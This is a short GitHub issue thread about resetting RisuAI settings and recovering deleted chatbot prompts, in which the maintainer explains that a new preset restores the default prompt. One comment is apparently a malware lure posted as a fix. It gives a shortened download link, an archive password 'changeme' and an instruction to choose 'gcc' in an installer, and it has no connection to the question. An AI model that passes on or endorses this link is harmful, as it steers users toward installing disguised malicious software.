### ISSUE TITLE
How to reset settings to default ?

### ISSUE THREAD

**Issue by razvanab** [kwaroran/RisuAI#607]
How do I reset RisuAI settings to default?
I deleted some Chat Bot prompt settings by mistake, and I can't get them back even when I reinstall the app.

Also, there is no way to reset the password on the website.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Asherathe** [comment]
I have the same issue. I accidentally deleted the main prompt by switching to a different type briefly, only to realize that this deletes the text that was initially there with seemingly no way to recover it.

**Comment by kwaroran** [comment]
You can make a new preset, the new preset will contain default prompt.
